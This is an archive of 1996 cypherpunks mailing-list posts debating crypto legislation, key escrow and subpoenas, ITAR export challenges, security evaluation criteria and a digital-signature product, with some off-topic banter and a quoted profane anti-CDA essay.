Date: Tue, 26 Mar 1996 11:07:19 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: LIST OF SHAME VOLUNTEERS
In-Reply-To: <m0u1GxP-00090nC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960325161732.1146C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, jim bell wrote:

> At 01:22 AM 3/25/96 -0500, Declan B. McCullagh wrote:

> >I spoke to a couple folks about this at the CDA hearings in Philadelphia
> >last week. Word on the streets from those who would know is that the
> >Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
> >supporting to raise awareness of crypto.
> 
> This is a dangerous position to take.  Many people have killed 
> themselves, accidentally, thinking "the gun isn't loaded!"

Let's put this to bed.  The bill isn't going to pass.  Let's PRETEND it 
gets sent to the Select Committee on Intelligence, which would be it's 
most favorable Committee speed wise (I seem to remember it got sent to 
commerce instead?), they have about 30 days to hash it through and spit 
it out.  That leaves 10 or so days to work out the bugs and pass the 
bill and then some 5 days to rectify with the house version?  Puhleeeease. 

> This said, I see nothing wrong with fixing and improving the bill and 
> only then supporting it.

Except that no one is going to fix it, and no one is going to support it 
if fixed in the way that Mr. Bell proposes.  In other words, everything is 
wrong with 'fixing it.'

Leahy is about as far left on technology as they come. (One of 4-5 (I 
forget) who actually opposed Exon).  I spoke with legislative counsel 
today and brought up the issue.  The bill is dead.  Even Dole, who's on 
as a sponsor, has no idea what's in the text.  He signed on to look 
connected and on the cutting edge for the upcoming election.  The 
slightest pressure from Specter and the Powerful Intelligence Committee 
(which you can count on), will send Dole running for cover quite 
quickly.  (Dole then will be able to claim techno-savvy as well as law 
and order headcracking).

> >After DT and Clipper, it's our chance to put Clinton and the DoJ on the
> >defensive for a change.
> 
> If the Leahy bill "has not a chance in hell" of passing, then what's 
> wrong with CORRECTING it.  Given this assessment,I doubt whether such 
> changes would reduce its chances.

Your tax dollars at work.  More useless legislative rambling to make Mr. 
Bell happy.  If the bill isn't adopted this session, nothing but a full 
rewrite is likely to revive it.  That rewrite is going to be next 
session and go to the right, not the left.  Mr. Bell persists in 
demanding a politically unviable re-write.  To Mr. Bell I say: "Write 
your Senator.

> BTW, remember that one of the reasons its chances are rated as "not a 
> chance in hell" is that the two constituencies who might normally 
> support this bill, the crypto/software businesses and ourselves, see its 
> promises as being weak and its negatives as being large. Without them, 
> who else is there to support it?

I've now answered this question 3 times.  Maybe Mr. Bell finally 
killfiled me.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: suyama@open.tjsys.co.jp (=?ISO-2022-JP?B?GyRAP1w7MxsoQg==?= =?ISO-2022-JP?B?GyRASVJDSxsoQg==?=)
Date: Tue, 26 Mar 1996 01:23:20 +0800
To: cypherpunks@toad.com
Subject: DESCRIBE
Message-ID: <19963251754.11078@suyama.kirin>
MIME-Version: 1.0
Content-Type: text/plain


undescribe cypherpunks@toad.com suyama@open.tjsys.co.jp
---
$@"!(B $@ElpJs%7%9%F%`!J3t!K%*!<%W%s%7%9%F%`K\It(B
$@"!(B $@%*!<%W%s%M%C%H;v6HIt(B $@%*!<%W%s%M%C%H;Y1g5;=QIt(B
$@"!(B 
$@"!(B  $@?\;3(B $@IRCK(B $@!J(BE-Mail:suyama@open.tjsys.co.jp$@!K(B
$@"!(B
$@"!(B  TEL 044-246-8477 FAX 044-246-8134 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 26 Mar 1996 22:12:52 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u1NSG-00093TC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 3/25/96 -0800, Timothy C. May wrote:

>I don't see any compelling need for U.S. legislation. And given the
>pressures to attach all sorts of language to bills, I think it best that no
>legislation happen.

[stuff deleted]

>IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
>a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
>5th Amendment's protections against self-incrimination, and so must honor a
>subpoena. Sounds accurate to me. 

While this may end up looking like another of Jim Bell's odd 
interpretations, the only section in the US Constitution that I see as 
potentially REQUIRING a person's testimony is the section (can't recall 
which) which says that a defendant must have a process to compel the 
appearance of witnesses in his favor.  The Constitution, as far as I see, 
says nothing about requiring people to appear for the PROSECUTION.

I know that plenty of judges just automatically assume that this requirement 
is somehow in there, but a literal reading of the Constitution doesn't 
provide it.  If that's the case, the government has and should have no 
mechanism to force any key escrow agent to reveal a key.


>However, what if Joe is _also_ one's
>lawyer? Does attorney-client privilege apply here? Perhaps. A better
>solution is also fully legal at this time: use only offshore key storage. A
>U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
>Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
>and I could have a stipulation that such "duress requests" will not be
>honored, no matter how loudly I squawk.)

I've always been astonished at the assumption that the government seems to 
be making that key escrow (which is fundamentally done for the benefit of 
the key holder) will be implemented in a way that could possibly help the 
cops out, in a way done to the detriment of the key holder.  



>>I do feel that it should be possible for courts to sub poena crypto keys,
>>but that doesn't really need new law either (4th and 5th ammendments
>>become _really_ important though (hmmm- there advantages to writing down a
>>constitution after all :)
>
>I agree that subpoenas for keys are legit. While I may dislike giving up my
>key, in a criminal matter it seems like "just another document." If they
>can subpoena my diary, my phone records, my dentist bills, why not another
>this document? Nothing in the Constitution giving it special status.

But are subpoenas _really_ constitutional?  In any case, one of the effects 
of the widespread availability of good encryption might be that suddenly the 
documents that cops have historically thought were subpoena-able will no 
longer be.  That's life, although they won't like it.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 26 Mar 1996 13:54:23 +0800
To: maldrich@grctechs.va.grci.com (Mark Aldrich)
Subject: Re: NT's C2 rating
In-Reply-To: <Pine.SCO.3.91.960323142342.1956C-100000@grctechs.va.grci.com>
Message-ID: <199603252239.RAA06963@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Aldrich writes:
> 
> On Sat, 23 Mar 1996, Bill Frantz wrote:
> 
> > At  5:11 PM 3/22/96 -0600, Rick Smith wrote:
> > >The big deal is that few vendors have tried to get NCSC evaluations.
> > 
> > We walked KeyKOS a long way down the path to a B2 rating.  Our investors
> > refused to fund the estimated $1 million it would cost to do all the
> > paperwork.  They felt there was no market for NCSC secure systems.  Perhaps
> > others felt the same way.
> 
> Hopefully, with the Common Criteria replacing the Orange Book (pray, this 
> year), you'll now be able to evaluate against a profile for a lot less 
> money.  And, believe it or not, customers will actually get security 
> products they need instead of another instance of the Bell-LaPadula model 
> crafted to military specs.

Well, I haven't exactly been "plugged in" to the development of the CC
but given the sheer size of the criteria (I just downloaded it, killing
a small tree to print its more than 1000 pages), I'm curious to know why
you think evaluations will be so much less expensive.

At first glance, some of the requirements seem a little more specific
and the evaluation process a bit more flexible, but evaluating an entire
OS, for example, is still going to take many man-years (excuse me,
person-years) of engineering labor.  And then, when you're done, still
nobody will want what you've got since it will inevitably be two releases
behind the "non-secure" version and you will have thrown out some pieces
where it was too much trouble to make them work "securely".

It appears to me that the main difference is that your system will be
unwanted in several different countries at once. :-)


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 27 Mar 1996 17:19:16 +0800
To: "Declan B. McCullagh" <sandfort@crl.com>
Subject: Re: LIST OF SHAME VOLUNTEERS
Message-ID: <199603260346.TAA29765@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 AM 3/25/96 -0500, Declan B. McCullagh wrote:
> Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
> supporting to raise awareness of crypto.

Washington is the last place where we wish to raise awareness of
crypto
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 27 Mar 1996 17:27:49 +0800
To: Phil Karn <cypherpunks@toad.com
Subject: Re: Bad news from Judge Richey
Message-ID: <m0u1PQw-0008zzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:21 PM 3/25/96 -0800, Phil Karn wrote:
>Last Friday, Judge Richey issued a 36-page opinion dismissing my suit
>against the State Dept.
>
>I am waiting for a copy of the opinion, which should arrive in paper
>form tomorrow. I'll post it on my web site when it's available in
>electronic form. (http://www.qualcomm.com/people/pkarn/export)
>
>I'll be meeting my attorneys next Monday to plan an appeal strategy.

I realize that this may appear to be a rather disrespectful tactic, but have 
you considered reminding the judge that if you are not allowed to profit by 
exporting encryption that the government doesn't want to see exported, 
you'll just have to make money in some other way, and this may lead you to 
talk to Jim Bell about implementing a program using encryption that doesn't 
_need_ to be exported...legally anyway.

Jim Bell

jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 26 Mar 1996 17:38:57 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603260516.VAA06327@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 3/25/96 -0800, Timothy C. May wrote:
> Besides, I think the best way to overturn the
> ITARs is through a court challenge; as I have noted, even the NSA's lawyers
> felt that the ITARs would not withstand court scrutiny.

Note that the spooks have carefully avoided a full bore court 
showdown.  They harassed Phil until the statute of limitations 
caught up with them, but never brought it to trial.  If we had
no further legislation, and the courts broke ITAR, we would
be home free.  No plausible legislation could give us that.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Mar 1996 21:52:34 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <199603252350.PAA08745@netcom5.netcom.com>
Message-ID: <Pine.SOL.3.91.960325211308.3834D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Bill Frantz wrote:

> At  1:32 PM 3/25/96 -0500, Black Unicorn wrote:
> to type them.  Since storage was limited, and old messages were purged from
> the system it also had the effect that anti-trust discovery would have
> nothing to discover.

Hmmm - that's another issue; what about diffie hellman with ephemeral 
keys? Once the transaction is complete, unless you keep a copy of the key, 
even you can't decrypt that session. Would a law requiring you to keep a 
copy of the keys be important. It would have the advantage of allowing 
a sub-poena to be more restrictive than "just hand over your private 
key", but it's a pretty heavy (undue?) burden. 

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 26 Mar 1996 21:49:12 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Re: Why and how people work for free on "challenges"
In-Reply-To: <Pine.SV4.3.91.960325213654.8787A-100000@larry.infi.net>
Message-ID: <Pine.SOL.3.91.960325212130.3834E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Alan Horowitz wrote:

> Why does the news media think I care if someone has succeeded in 
> ballooning across the Atlantic Ocean?  

Because it's a cool thing to do?

And why isn't he using his own airline  :-) (Love those Masseusses in "Upper 
Class")

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Mar 1996 15:47:28 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <ad7ca9740602100452ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 AM 3/26/96, jim bell wrote:

>While this may end up looking like another of Jim Bell's odd

Yes, you got this part right.

>interpretations, the only section in the US Constitution that I see as
>potentially REQUIRING a person's testimony is the section (can't recall
>which) which says that a defendant must have a process to compel the
>appearance of witnesses in his favor.  The Constitution, as far as I see,
>says nothing about requiring people to appear for the PROSECUTION.

IANACS (I am not a Constitutional scholar), but it is clear that the
Constitution, being a relatively short document, is a _framework_, a kind
of "generator," for establishing additional legislation. This is, obviously
enough, why there is _legislative branch_, after all.

Jim's argument (?) could be turned in all sorts of ways: "Your Honor, there
is nothing I can find in the Constitution that says I can't drive on the
left side of the road at 125 miles per hour." Indeed, there is nothing
laying out detailed traffic laws. And so on.

That the Fifth Amendment attempts to make it clear that a defendant shall
not be compelled to give testimony which may tend toincriminate himself
(lotsa gotchas, as expected) clearly--to me if not to Jim Bell--implies
that a "legal system" involving testimony, search warrants, subpoenas,
juries, verdicts, appeals, etc., is implied by various parts of the
Constitution.

(I could search one of the many online copies of the Big C for details, but
I'm sure you all, except perhaps Jim, get it.)

I'm no apologist for Big Government, of course, so I think we have vastly
too many laws in the U.S. But I don't think naive arguments saying that a
court cannot call witnesses by due process because the Constitution does
not specifically have a clause saying this is the case is going to be very
helpful or persuasive.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Tue, 26 Mar 1996 14:12:14 +0800
To: cypherpunks@toad.com
Subject: Mentor request - ISEF/Westinghouse science fair project
Message-ID: <3157569C.3BC@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks,
  My name is Jack Mott, and I'm the junior in highschool who posted the 
c++ source code a while ago, and as you can see it is pretty bad. ( self 
taught over 9 months ) Anyway for a science fair project this year, I 
would like to either create a new, or implement an existing encryption 
algorithm from scratch.  I need someone who has some experience 
programming in C/C++ and with crypto to get advice from and consult with 
from time to time. I have done well in science fairs in the past, and I 
could definitely win states with some help.  If anyone is interested let 
me know.

p.s. - there is another interesting twist to my project, but I don't 
want to give the idea away just yet.
-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Tue, 26 Mar 1996 18:15:16 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Re: Why and how people work for free on "challenges"
In-Reply-To: <Pine.SV4.3.91.960325213654.8787A-100000@larry.infi.net>
Message-ID: <199603260534.VAA08360@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Alan Horowitz <alanh@mailhost.infi.net>]
[cc: cypherpunks@toad.com]
[Subject: Re: Why and how people work for free on "challenges" ]
[In-reply-to: Your message of Mon, 25 Mar 96 21:47:17 EST.]
             <Pine.SV4.3.91.960325213654.8787A-100000@larry.infi.net> 

>I think the "challenges" thing has gotten too ridiculous. Didn't some guys
>try to recently walk across Antarctica? Ended up eating some of their dogs
>before the Norwegian Coast Guard bailed out their ass, if I recall
>correctly? 

Wow, those Norwegians must be pretty keen to go all the way to
Antarctica...

Seasoned (ant)arctic explorers consider dogs to be stored food
anyway. You just don't eat them till the sleds get lighter, that is all.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCUAwUBMVd2zIHskC9sh/+lAQFcTQP3Ud6xD/5mMEStL4KB8yZKhOOTIgE5/mgb
LZPX6irUZsh4+xVSshF3xU6k1FxnBNISx4fJHYBbX9rzeZbacQ6iMuD5nT22ENSf
5KZUjdGDKiqmkN1qtxFpB6TDql0Tm92Y40L+VUtytyjw3bHaVtNrNKKNxfwu5phJ
Zkb3Lod8gA==
=Fz6J
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Josh Richards <jrichard@slonet.org>
Date: Tue, 26 Mar 1996 18:10:43 +0800
To: CA20007@aol.com
Subject: Re: signature appl tested by IRS / PR today
In-Reply-To: <960325141609_454384469@emout08.mail.aol.com>
Message-ID: <Pine.OSF.3.91.960325213935.25870B-100000@biggulp.callamer.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996 CA20007@aol.com wrote:

> Today, on Monday, March 25th, in New York, a British company, Peripheral
> Vision Ltd., is demonstrating their technology for recording signatures
> electronically.
> 
> The company is also launching a subsidiary called PenOp Inc. today.
> 
> Their product is a plug-in for Netscape.
> 
> users use a wacom board or its equivalent for writing actual signatures.
> 
> IRS is testing the system for verifying signatures at a number of test sites.
> 

If anybody is interested in this signature technology:

PenOp, Inc. has a web site, see <URL:http://www.penop.com/>.

Josh Richards (jrichard@slonet.org)
SLONET Regional Information Access, Inc., Development Team
SLO Street Tech Development (Computer Services)
<URL:http://www.slonet.org/~jrichard/>
 ------------------------------------------------------------------------
| ATTENTION: I'm in search of a job as a WebMaster, Internet Consultant, |
| Programmer, or other(?).  Please e-mail me for further details.        |
 ------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 26 Mar 1996 14:35:36 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <ad7c25ce0402100464ca@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960325214107.7695I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Timothy C. May wrote:

[...many things including...]
> 
> (Michael Froomkin speculated in one of his articles, I don't recall which,
> that there might need to be certain guidelines or laws if a key escrow
> protocol were to invoke the U.S. court system. Maybe. But I think ordinary

It's my clipper article, see the link from my homepage.  The claim 
(disputed, BTW, by many experts) is that it's not obvious that the 
constitution allows judges to hold keys in the absence of an onging 
judicial proceeding involving the owner of the key because the separation 
of powers would classify this action as "executive".

> contract law, about what a contract says and what it means, is adequate. If
> I pay Joe's Key Warehouse a fee to store my key and it loses it, or gives
> it to another party, then damages can be collected.)
> 
I agree that absent a statute all that is involved is contract law.

[...]

> IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
> a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
> 5th Amendment's protections against self-incrimination, and so must honor a
> subpoena. Sounds accurate to me. However, what if Joe is _also_ one's
> lawyer? Does attorney-client privilege apply here? Perhaps. A better

NO IT DOES NOT.  Basic rule of thumb: your lawyer can't be used to hide 
papers someone else can't hide.  Ok, at the margin it gets tricky, but 
bascially the privilege is not going to stretch to your key.

> solution is also fully legal at this time: use only offshore key storage. A
> U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
> Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
> and I could have a stipulation that such "duress requests" will not be
> honored, no matter how loudly I squawk.)

An interesting issue, likely to be addressed in future judicial 
assistence treaties...

[...]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Tue, 26 Mar 1996 22:10:03 +0800
Subject: Re: Why and how people work for free on "challenges"
In-Reply-To: <ad7b38320002100490f1@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960325213654.8787A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I think the "challenges" thing has gotten too ridiculous. Didn't some guys
try to recently walk across Antarctica? Ended up eating some of their dogs
before the Norwegian Coast Guard bailed out their ass, if I recall
correctly? 

Why does the news media think I care if someone has succeeded in 
ballooning across the Atlantic Ocean?  

I there any assinine project that some fool won't attempt?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 26 Mar 1996 15:02:36 +0800
To: CA20007@aol.com
Subject: Re: signature appl tested by IRS / PR today
In-Reply-To: <960325141609_454384469@emout08.mail.aol.com>
Message-ID: <Pine.SUN.3.91.960325214638.7695J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


can someone explain to me how this device protects against replay attacks?

On Mon, 25 Mar 1996 CA20007@aol.com wrote:

> Today, on Monday, March 25th, in New York, a British company, Peripheral
> Vision Ltd., is demonstrating their technology for recording signatures
> electronically.
> 
> The company is also launching a subsidiary called PenOp Inc. today.
> 
> Their product is a plug-in for Netscape.
> 
> users use a wacom board or its equivalent for writing actual signatures.
> 
> IRS is testing the system for verifying signatures at a number of test sites.
> 
> 

[The above may have been dictated with Dragon Dictate/Win 2.0 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 26 Mar 1996 18:06:19 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: signature appl tested by IRS / PR today
In-Reply-To: <Pine.SUN.3.91.960325214638.7695J-100000@viper.law.miami.edu>
Message-ID: <199603260414.XAA10730@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Froomkin writes:
> can someone explain to me how this device protects against replay attacks?

There is an assumption contained in your question. It may not be warranted.

> 
> On Mon, 25 Mar 1996 CA20007@aol.com wrote:
> 
> > Today, on Monday, March 25th, in New York, a British company, Peripheral
> > Vision Ltd., is demonstrating their technology for recording signatures
> > electronically.
> > 
> > The company is also launching a subsidiary called PenOp Inc. today.
> > 
> > Their product is a plug-in for Netscape.
> > 
> > users use a wacom board or its equivalent for writing actual signatures.
> > 
> > IRS is testing the system for verifying signatures at a number of test site
s.
> > 
> > 
> 
> [The above may have been dictated with Dragon Dictate/Win 2.0 voice 
> recognition. Be alert for unintentional strange word substitutions.]
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's warm here.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Mar 1996 18:23:12 +0800
To: cypherpunks@toad.com
Subject: Let's *NOT* "Raise their Awareness"
Message-ID: <ad7cc52907021004d50e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 AM 3/26/96, jamesd@echeque.com wrote:
>At 01:22 AM 3/25/96 -0500, Declan B. McCullagh wrote:
>> Leahy Bill has NOT A CHANCE IN HELL of passing, and so is worth
>> supporting to raise awareness of crypto.
>
>Washington is the last place where we wish to raise awareness of
>crypto

I try to avoid "me too" echoes, but this is worth concurring with, strongly.

Nothing good can come out of "raising awareness," especially of an issue
where the Consitution is already pretty clearly on the side of the right to
speak in whatever language one chooses, to keep diaries in code if one
wishes, to whisper to others, to place curtains on windows, to lock doors,
and so on. (I suppose Jim Bell will point out that the Constitution
contains no explicit language about placement of curtains....)

Whenever Congress gets "exercised" about some subject, laws are often the
result. And often the seemingly minor things thrown in to satisfy some
interest end up ensnaring us in a new set of regulations.

No thanks.

We already can freely encrypt. We already can use any strength of cipher we
can get. We already can deposit a spare key with our mother-in-law or with
a friend in Lichtenstein. What more do we need?

Free export of crypto products would be nice. But not if the quid pro quo
for this is giving up some of the freedoms we already have.

And "raising awareness" also increases the chances for _international
treaty_ discussions. Frankly, the U.S. will be the instigator of any such
treaty discussions, so the more ignorant the diplomats and legislators are,
the better. Then they'll be less likely to broach the subject with their
Italian, German, French, and Russian counterparts...the more of an "urgent
issue" crypto is, the more it is being publically debated, the greater will
be the likelihood that diplomats and legislators will "do something!"

Remember the First Rule of Politics: "Look important and pass laws."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 27 Mar 1996 13:29:46 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
Message-ID: <199603260757.XAA27985@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:20 PM 3/25/96 -0800, Simon Spero wrote:
>On Mon, 25 Mar 1996, Bill Frantz wrote:
>
>> At  1:32 PM 3/25/96 -0500, Black Unicorn wrote:
>> to type them.  Since storage was limited, and old messages were purged from
>> the system it also had the effect that anti-trust discovery would have
>> nothing to discover.
>
>Hmmm - that's another issue; what about diffie hellman with ephemeral 
>keys? Once the transaction is complete, unless you keep a copy of the key, 
>even you can't decrypt that session. Would a law requiring you to keep a 
>copy of the keys be important. It would have the advantage of allowing 
>a sub-poena to be more restrictive than "just hand over your private 
>key", but it's a pretty heavy (undue?) burden. 

With PGP at least, it should be possible to hand over the IDEA key required
to decrypt each message in question without having to hand over your
private key.  Since the court would have your public key, they could verify
that the IDEA key you gave them was indeed the correct key.

Of course if they are using the subpoena to intimidate you, then they will
insist on the private key.

N.B. The IBM voice system mentioned above (and the attribution should be to
me, and not Black Unicorn) did not use any crypto.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Mar 1996 23:37:17 +0800
To: blanc <blancw@accessone.com>
Subject: RE: ITAR double standards?
Message-ID: <ad7cd51c0c021004945a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:54 AM 3/26/96, blanc wrote:
>From:   Timothy C. May
>
>>You're a felon? For real?
>>
>
>Yes.
>.................................................................
>
>Ah, yes  -   Tim the Indecent, vis-a-vis X-onomous signatures.
>Sheut.  I thought maybe you'd done something really interesting.
>

Oh, I may have done some pretty juicy things that are felonies in some
states (maybe even states I was living in at the time)...plus I know a
whole lot of folks who feloniously violate our nation's "dietary laws"
nearly every day (eating the wrong things seems to be the common
denominator). Similarly, various popular sexual practices--even some
mentioned favorably in the Bible--are felonies in many U.S. states.

I've kept the CP list copied on my replies to Blanc because it makes a
larger point: every time the nation felonizes a new set of common
behaviors, it risks making more and more people felons and thus reduces
respect for the law (the real law, about real crimes). This happened during
Prohibition (for you foreigners, this was America's experiment with
outlawing alcohol consumption), when the law was flouted by even cops and
elected officials (in "speakeasies") and when the La Cosa Nostra really got
its big boost.

Not being one who worries about his standing amongst "the neighbors," I
casually mentioned to one of them that I doubted I'd have to serve on jury
duty, due to being a felon. He looked appropriately surprised; I haven't
bothered to tell him that while I'm indeed a felon under the Communications
Decency Act (Fuck Exon), I haven't yet been charged nor have I been
convicted. (One is a felon when one has committed a felony....look it up.
One is a _convicted_ felon when one has been convicted. But the felony has
still happened.)

The dictionary doesn't make it clear what happens to the status of a felony
when the law is changed and the act is no longer a felony. (If the CDA is
overturned, then I guess my actions in saying "Fuck Exon" will no longer be
felonies. But as it stands now, they are indeed felony vioations of the
CDA. Hence, I am a felon.)

--Tim May




THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
